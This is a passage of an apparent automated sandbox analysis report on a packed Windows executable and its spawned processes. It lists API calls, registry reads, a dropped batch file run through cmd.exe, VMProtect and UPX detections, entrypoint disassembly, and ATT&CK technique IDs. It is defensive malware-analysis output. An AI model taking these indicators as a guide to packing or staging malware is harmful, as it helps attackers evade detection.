\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\_vslite.bat (UID: 00000000-00002180)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005888)\n \"bucei.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005888)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004204)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004204)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004204)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004204)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004204)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003640)\n \"bytudy.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\_vslite.bat (UID: 00000000-00003640)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter comdlg32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter msimg32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter winspool.drv (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter imm32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter RICHED20.DLL (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter WS2_32.DLL (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter Fwpuclnt.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00000328)\n \"syzoe.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00000328)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000336)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000336)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000336)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000336)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"syzoe.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" file has an entrypoint instructions - \"push\tedx,pushfd\t,mov\tedx, 0x4a670ec0,call\t0x924839,inc\teax,xor\tebx, eax,add\tesi, eax,jmp\t0xe620d1,add\tesi, 4,rcr\tah, cl,movzx\teax, byte ptr [edi],add\tedi, 1,cmc\t,cmp\tsp, dx,xor\tal, bl,jmp\t0x9eb1eb,add\tedi, eax,jmp\t0x904a18,ror\tecx, 1,cmp\tsp, dx,test\tbx, sp,neg\tecx,jmp\t0xe9b632,jmp\tebp,movzx\teax, byte ptr [esi],adc\tdx, si,sbb\tdx, si,shld\tdx, ax, 0x31,add\tesi, 1,bsf\tdx, si,rcr\tcl, cl,\"\n \"syzoe.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x526000,lea\tedi, [esi - 0x125000],mov\tdword ptr [edi + 0x14f9f4], 0x9bc47d1a,push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x5961b2,inc\tesi,inc\tesi,push\tebx,push\t0x1942c4,push\tedi,add\tebx, 4,push\tebx,push\t0x70180,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"bucei.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"bytudy.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000\n \"syzoe.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76620000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"bucei.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"bucei.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"bucei.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"bytudy.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"bytudy.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"bytudy.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"syzoe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"syzoe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"syzoe.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"bytudy.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"bytudy.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"syzoe.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"syzoe.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"bucei.exe\" (UID: 00000000-00005888)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004204)\n Spawned process \"bytudy.exe\" with commandline \"OK\" (UID: 00000000-00003640)\n Spawned process \"syzoe.exe\" (UID: 00000000-00000328)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000336)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"bucei.exe\" (UID: 00000000-00005888)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004204)\n Spawned process \"bytudy.exe\" with commandline \"OK\" (UID: 00000000-00003640)\n Spawned process \"syzoe.exe\" (UID: 00000000-00000328)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000336)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00004204)\n Process \"cmd.exe\" with commandline \"/c \"\"%TEMP%\\\\_vslite.bat\" \"\" (UID: 00000000-00000336)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" was detected as \"VMProtect\" and name: \"Protector\"\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"syzoe.exe\" was detected as \"VMProtect\" and name: \"Protector\"\n \"syzoe.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".-(H\" is \"0x353fba\" greater than 0x100000\n Virtual size of \".Jk)\" is \"0x664c30\" greater than 0x100000\n Virtual size of \"UPX0\" is \"0x125000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter ConvertStringSidToSidW (UID: 00000000-00002180)\n \"b72ad18cea301f8cd7993ae4a4e177826477e23e1ff762cca494510b90a82df0.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00002180)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionAndSpinCount (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadDWORD (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadBSTR (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter PSPropertyBag_ReadGUID (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005888)\n \"bucei.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 